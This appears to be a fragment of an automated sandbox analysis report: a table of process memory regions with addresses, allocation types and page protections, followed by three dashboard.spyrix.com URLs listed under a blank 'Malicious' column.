||
2FCC000
|
heap
|
page read and write
|
||
3870000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
3330000
|
direct allocation
|
page execute and read and write
|
||
1B0A000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
5014000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7FC50000
|
direct allocation
|
page read and write
|
||
1FF665A0000
|
heap
|
page read and write
|
||
2BE175D0000
|
remote allocation
|
page read and write
|
||
35F0000
|
direct allocation
|
page execute and read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
954E000
|
stack
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
4130000
|
direct allocation
|
page execute and read and write
|
||
1295C21F000
|
heap
|
page read and write
|
||
98E000
|
stack
|
page read and write
|
||
5460000
|
heap
|
page read and write
|
||
1AF3000
|
heap
|
page read and write
|
||
A4F000
|
stack
|
page read and write
|
||
3489000
|
heap
|
page read and write
|
||
A86000
|
unkown
|
page execute and write copy
|
||
778C000
|
heap
|
page read and write
|
||
2BE12800000
|
heap
|
page read and write
|
||
30CE000
|
stack
|
page read and write
|
||
2EE6000
|
trusted library allocation
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
51E3000
|
heap
|
page execute and read and write
|
||
16B0000
|
heap
|
page read and write
|
||
958000
|
unkown
|
page readonly
|
||
6D0000
|
heap
|
page read and write
|
||
3C00000
|
direct allocation
|
page execute and read and write
|
||
A2E0000
|
trusted library allocation
|
page read and write
|
||
2CA4000
|
heap
|
page read and write
|
||
4300000
|
direct allocation
|
page execute and read and write
|
||
329C000
|
heap
|
page read and write
|
||
7AF2000
|
heap
|
page read and write
|
||
4450000
|
direct allocation
|
page execute and read and write
|
||
C9C000
|
stack
|
page read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
78CD000
|
stack
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
85A6000
|
direct allocation
|
page read and write
|
||
2DBA000
|
trusted library allocation
|
page read and write
|
||
35D0000
|
direct allocation
|
page execute and read and write
|
||
3659000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
2BE1752C000
|
trusted library allocation
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
3ED0000
|
direct allocation
|
page execute and read and write
|
||
3C20000
|
heap
|
page read and write
|
||
1ABEA8B000
|
stack
|
page read and write
|
||
7B6C000
|
heap
|
page read and write
|
||
7720000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
226E000
|
direct allocation
|
page read and write
|
||
4040000
|
direct allocation
|
page execute and read and write
|
||
189A000
|
heap
|
page read and write
|
||
1067000
|
unkown
|
page write copy
|
||
1A8F000
|
stack
|
page read and write
|
||
2C7C000
|
stack
|
page read and write
|
||
5014000
|
trusted library allocation
|
page read and write
|
||
3E00000
|
direct allocation
|
page execute and read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
327D000
|
stack
|
page read and write
|
||
359E000
|
stack
|
page read and write
|
||
40B0000
|
direct allocation
|
page execute and read and write
|
||
FF385FE000
|
unkown
|
page readonly
|
||
3360000
|
direct allocation
|
page execute and read and write
|
||
580E000
|
stack
|
page read and write
|
||
1B22000
|
heap
|
page read and write
|
||
4D4C000
|
direct allocation
|
page read and write
|
||
7723000
|
heap
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
516F000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
2ACB000
|
heap
|
page read and write
|
||
843000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2FE4000
|
heap
|
page read and write
|
There are 2701 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/
|
||
https://dashboard.spyrix.com/login
|